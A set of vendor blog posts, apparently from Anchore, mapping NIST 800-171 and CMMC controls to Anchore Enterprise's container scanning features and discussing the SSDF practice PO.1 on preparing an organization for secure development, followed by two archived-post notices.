  • Level 2 Advanced:  This maps directly to NIST Special Publication (SP) 800-171. Its primary goal is to ensure that government contractors are properly protecting controlled unclassified information (CUI).
  • Level 3 Expert: This maps directly to NIST Special Publication (SP) 800-172. Its primary goal is to go beyond the base-level security requirements defined in NIST 800-171. NIST 800-172 provides security requirements that specifically defend against advanced persistent threats (APTs).

This is of critical importance as these organizations leverage common place DevOps tooling to build their software. Additionally, these large organizations may be working with smaller subcontractors or suppliers who are building software in tandem or partnership. 

For example, a mega-defense contractor is working alongside a small mom-and-pop shop to develop software for a classified government system. Lots of questions we should have here:

  1. How can my company as a mega-defense contractor validate what software built by my partner is not using blacklisted software packages?
  2. How can my company validate software supplied to me is free of malware?
  3. How can I validate that the software supplied to me is in compliance with licensing standards and vulnerability compliance thresholds of my security team?
  4. How do I validate that the software I’m supplying is compliant not only against NIST 800-171 and CMMC, but against the compliance standards of my government end user (Such as NIST 800-53 or NIST 800-161)?

Validating Security between DevSecOps Pipelines and Software Supply Chain

At any major or small contractor alike, everyone has taken steps to build internal DevSecOps (DSO) pipelines. However, the defense industrial base (DIB) commonly involves daily relationships in which smaller defense contractors supply software to a larger defense contractor for a program or DSO pipeline that consumes and implements that software. With Anchore Enterprise, we can now validate if that software supplied is compliant with CMMC controls as specified in NIST 800-171.

Looking to learn more about how to achieve CMMC Level 2 or NIST 800-171 compliance? One of the most popular technology shortcuts is to utilize a DoD software factory. Anchore has been helping organizations and agencies put the Sec in DevSecOps by securing traditional software factories, transforming them into DoD software factories.

Which Controls does Anchore Enterprise Automate?

3.1.7 – Restrict Non-Privileged Users and Log Privileged Actions

Related NIST 800-53 Controls: AC-6 (10)

Description: Prevent non-privileged users from executing privileged functions and capture the execution of such functions in audit logs. 

Implementation: Anchore Enterprise can scan the container manifests to determine if the user is being given root privileges and implement an automated policy to prevent build containers from entering a runtime environment. This prevents a scenario where any privileged functions can be utilized in a runtime environment.

3.4.1 – Maintain Baseline Configurations & Inventories

Related NIST 800-53 Controls: CM-2(1), CM-8(1), CM-6

Description: Establish and maintain baseline configurations and inventories of organizational systems (including hardware, software, firmware, and documentation) throughout the respective system development life cycles.

Implementation: Anchore Enterprise provides a centralized inventory of all containers and their associated manifests at each stage of the development pipeline. All manifests, images and containers are automatically added to the central tracking inventory so that a complete list of all artifacts of the build pipeline can be tracked at any moment in time.

3.4.2 – Enforce Security Configurations

Related NIST 800-53 Controls: CM-2 (1) & CM-8(1) & CM-6

Description: Establish and enforce security configuration settings for information technology products employed in organizational systems.

Implementation: Implementation: Anchore Enterprise scans all container manifest files for security configurations and publishes found vulnerabilities to a centralized database that can be used for monitoring, ad-hoc reporting, alerting and/or automated policy enforcement.

3.4.3 – Monitor and Log System Changes with Approval Process

Related NIST 800-53 Controls: CM-3

Description: Track, review, approve or disapprove, and log changes to organizational systems.

Implementation: Anchore Enterprise provides a centralized dashboard that tracks all changes to applications which makes scheduled reviews simple. It also provides an automated controller that can apply policy-based decision making to either automatically approve or reject changes to applications based on security rules.

3.4.4 – Run Security Analysis on All System Changes

Related NIST 800-53 Controls: CM-4

Description: Analyze the security impact of changes prior to implementation.

Implementation: Anchore Enterprise can scan changes to applications for security vulnerabilities during the build pipeline to determine the security impact of the changes.

3.4.6 – Apply Principle of Least Functionality

Related NIST 800-53 Controls: CM-7

Description: Employ the principle of least functionality by configuring organizational systems to provide only essential capabilities.

Implementation: Anchore Enterprise can scan all applications to ensure that they are uniformly applying the principle of least functionality to individual applications. If an application does not meet this standard then Anchore Enterprise can be configured to prevent an application from being deployed to a production environment.

3.4.7 – Limit Use of Nonessential Programs, Ports, and Services

Related NIST 800-53 Controls: CM-7(1), CM-7(2)

Description: Restrict, disable, or prevent the use of nonessential programs, functions, ports, protocols, and services.

Implementation: Anchore Enterprise can be configured as a gating agent that will scan for specific security violations and prevent these applications from being deployed until the violations are remediated.

3.4.8 – Implement Blacklisting and Whitelisting Software Policies

Related NIST 800-53 Controls: CM-7(4), CM-7(5)

Description: Apply deny-by-exception (blacklisting) policy to prevent the use of unauthorized software or deny-all, permit-by-exception (whitelisting) policy to allow the execution of authorized software.

Implementation: Anchore Enterprise can be configured as a gating agent that will apply a security policy to all scanned software. The policies can be configured in a black- or white-listing manner.

3.4.9 – Control and Monitor User-Installed Software

Related NIST 800-53 Controls: CM-11

Description: Control and monitor user-installed software.

Implementation: Anchore Enterprise scans all software in the development pipeline and records all user-installed software. The scans can be monitored in the provided dashboard. User-installed software can be controlled (allowed or denied) via the gating agent.

3.5.10 – Store and Transmit Only Cryptographically-Protected Passwords

Related NIST 800-53 Controls: IA-5(1)

Description: Store and transmit only cryptographically-protected of passwords.

Implementation: Anchore Enterprise can scan for plain-text secrets in build artifacts and prevent exposed secrets from being promoted to the next environment until the violation is remediated. This prevents unauthorized storage or transmission of unencrypted passwords or secrets. See screenshot below to see this protection in action.

3.11.2 – Scan for Vulnerabilities

Related NIST 800-53 Controls: RA-5, RA-5(5)

Description: Scan for vulnerabilities in organizational systems and applications periodically and when new vulnerabilities affecting those systems and applications are identified.

Implementation: Anchore Enterprise is designed to scan all systems and applications for vulnerabilities continuously and alert when any changes introduce new vulnerabilities. See screenshot below to see this protection in action.

3.11.3 – Remediate Vulnerabilities Respective to Risk Assessments

Related NIST 800-53 Controls: RA-5, RA-5(5)

Description: Remediate vulnerabilities in accordance with risk assessments.

Implementation: Anchore Enterprise can be tuned to allow or deny changes based on a risk scoring system.

3.12.2 – Implement Plans to Address System Vulnerabilities

Related NIST 800-53 Controls: CA-5

Description: Develop and implement plans of action designed to correct deficiencies and reduce or eliminate vulnerabilities in organizational systems.

Implementation: Anchore Enterprise automates the process of ensuring all software and systems are in compliance with the security policy of the organization. 

3.13.4 – Block Unauthorized Information Transfer via Shared Resources

Related NIST 800-53 Controls: SC-4

Description: Prevent unauthorized and unintended information transfer via shared system resources.

Implementation: Anchore Enterprise can be configured as a gating agent that will scan for unauthorized and unintended information transfer and prevent violations from being transferred between shared system resources until the violations are remediated.

3.13.8 – Use Cryptography to Safeguard CUI During Transmission

Related NIST 800-53 Controls: SC-8

Description: Transmission Confidentiality and Integrity: Implement cryptographic mechanisms to prevent unauthorized disclosure of CUI during transmission unless otherwise protected by alternative physical safeguards.

Implementation: Anchore Enterprise can be configured as a gating agent that will scan for CUI and prevent violations of organization defined policies regarding CUI from being disclosed between systems.

3.14.5 – Periodically Scan Systems and Real-time Scan External Files

Related NIST 800-53 Controls: SI-2

Description: Perform periodic scans of organizational systems and real-time scans of files from external sources as files are downloaded, opened, or executed.

Implementation: Anchore Enterprise can be configured to scan all external dependencies that are built into software and provide information about relevant security vulnerabilities in the software development pipeline. See screenshot below to see this protection in action.

Wrap-Up

In a world increasingly defined by software solutions, the cybersecurity posture of defense-related industries stands paramount. The CMMC, a framework with its varying levels of compliance, underscores the commitment of the defense industrial base to fortify its cyber defenses. 

As a multitude of organizations, ranging from the largest defense contractors to smaller mom-and-pop shops, work in tandem to support U.S. missions, the intricacies of maintaining cybersecurity standards grow. The questions posed exemplify the necessity to validate software integrity, especially in complex collaborations. 

Anchore Enterprise solves these problems by automating software supply chain security best practices. It not only automates a myriad of crucial controls, ranging from user privilege restrictions to vulnerability scanning, but it also empowers organizations to meet and exceed the benchmarks set by CMMC and NIST. 

In essence, as defense entities navigate the nuanced web of software development and partnerships, tools like Anchore Enterprise are indispensable in safeguarding the nation’s interests, ensuring the integrity of software supply chains, and championing the highest levels of cybersecurity.

If you’d like to learn more about the Anchore Enterprise platform or speak with a member of our team, feel free to book a time to speak with one of our specialists.

Breaking Down NIST SSDF: Spotlight on P0.1 – Prepare the Organization

After the last blog post about SSDF, I decided to pick something much easier to write about, and it happens to be at the top of the list. We’ll cover PO.1 this time, it’s the very first control in the SSDF. The PO stands for Prepare the Organization. The description is

Define Security Requirements for Software Development (PO.1): Ensure that security requirements for software development are known at all times so that they can be taken into account throughout the SDLC and duplication of effort can be minimized because the requirements information can be collected once and shared. This includes requirements from internal sources (e.g., the organization’s policies, business objectives, and risk management strategy) and external sources (e.g., applicable laws and regulations).

How hard can it be to prepare the organization? Just tell them we’re doing it and it’s a job well done!

This is actually one of the most important steps, and one of the hardest steps when creating a secure development program. When we create a secure development program we really only get one chance with developers. What I mean by that is if we try to keep changing what we’re asking developers to do we create an environment that lacks trust, empathy, and cooperation. This is why the preparation stage is such an important step when trying to deploy the SSDF in your organization.

We all work for a company whose primary mission isn’t to write secure software, the actual mission is to provide a product or service to our customers. Writing security software is one of the tools that can help with the primary mission. Sometimes as security professionals we forget this very important point. Security isn’t the purpose, security is part of what we do or at least it should be part of what we do. It’s important that we integrate into the existing process and procedures that our organization has. One of the reference documents for PO.1 is NIST 800-161, or Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations. It’s worth reading the first few sections of NIST 800-161 not for the security advice, but the organizational aspect. It stresses the importance of cooperation and getting the company to buy into a supply chain risk management program. We could say the days of security-making mandates are over, but they probably never really existed.

The steps to prepare the organization

The PO step of the SSDF is broken into three pieces. The first two sections explain how to document the process we’re going to have to create and implement. The third section revolves around communicating these documented processes. This seems obvious, but the reality is it’s something that doesn’t happen on a regular basis. It’s really easy for a security team to create a process, but never tell anyone about it. Telling people about the process is harder than creating the process in many instances. It’s much harder to bring that process and policy to another group and collect their feedback on it and make sure they buy into it.

PO.1.1: Infrastructure security requirements

The first section is about documenting the internal infrastructure and process. There’s also a mention in the first control to maintain this documentation over time. It’s possible your organization already has these documents in place, if so, good job! If not, there’s no better time to start than now. SANS has a nice library of existing security policy documents that can help get things moving. The intention of these isn’t to take them as is and declare it your new security policy. You have to use existing documents as a guide and make sure you have agreement and understanding from the business. Security can’t show up with a canned document they didn’t write and declare it the new policy. That won’t work.

PO.1.2: Software security requirements

The second section revolves around how we’re going to actually secure our software and services. It’s important to note this control isn’t about the actual process of securing the software, but documenting what that process will look like. One of the difficulties of securing the software you build is there are no two organizations that are the same. Documenting how we’re going to build secure software or how we’re going to secure our environment is a lot of work. OWASP has a nice toolbox they call SAMM, or Software Assurance Maturity Model, that can help with this stage.

There’s no shortcut to building a secure development program. It’s a lot of hard work and there will be plenty of trial and error. The most important aspect will be getting cooperation and buy in from all the stakeholders. Security can’t do this alone.

PO.1.3: Communicate the requirements

The third section talks about communicating these requirements to the organization. How hard can communication be? A security team can create documentation and policy that is fantastic, but then they put it somewhere that the rest of the company might not know exists or in some cases, the rest of the company might not even be able to access.

This is obviously a problem because it has to be something that everyone in the organization is aware of and they know where to find it they know how to get help and they know what it is so it can’t be stressed how truly important this stage is. If you tell your developers that they have to follow your policy and it’s not well written or they can’t find it or they don’t understand why something is happening, those are developers that aren’t going to engage and they aren’t going to want to work with you 

Next steps

If you’re on a journey to implement SSDF, or you’re just someone looking to start formalizing your secure development program, these are some steps you can start taking today. This blog series uses SSDF as our secure development standard. You can start by reading the content NIST has published on their site Secure Software Development Framework. You can follow up on the SSDF content with a tour of the SANS policy templates. Most of these templates shouldn’t be used without customization. Every company and every development team will have unique processes and needs. The CSA has a nice document called CAIQ, or Consensus Assessment Initiative Questionnaire that can help create some focus on what you need. Combining this with a SAMM assessment would be a great place to start.

And lastly, whatever standard you choose, and whatever internal process you create, it’s important to keep in mind this is a fluid and ever-changing space. You will have to revisit decisions and assumptions on a regular basis. The SSDF standard will change, your business will change, everything will change. It’s the old joke that the only constant is change.

Want to better understand how Anchore can help? Schedule a demo here.

Josh Bressers

Josh Bressers is vice president of security at Anchore where he guides security feature development for the company’s commercial and open source solutions. He serves on the Open Source Security Foundation technical advisory council and is a co-founder of the Global Security Database project, which is a Cloud Security Alliance working group that is defining the future of security vulnerability identifiers.

NIST SP 800-53, the Control Catalog: A Guide in Plain English

This blog post has been archived and replaced by the supporting pillar page that can be found here: https://anchore.com/wp-admin/post.php?post=987473301&action=edit

The blog post is meant to remain “public” so that it will continue to show on the /blog feed. This will help discoverability for people browsing the blog and potentially help SEO. If it is clicked on it will automatically redirect to the pillar page.

NIST 800-37, the Risk Management Framework: A Guide in Plain English

This blog post has been archived. It is replaced by the supporting pillar page, found here: https://anchore.com/wp-admin/post.php?post=987473296&action=edit

The blog post is meant to remain “public” so that it will continue to show on the /blog feed. This will help discoverability for people browsing the blog and potentially help SEO. If it is clicked on it will automatically redirect to the pillar page.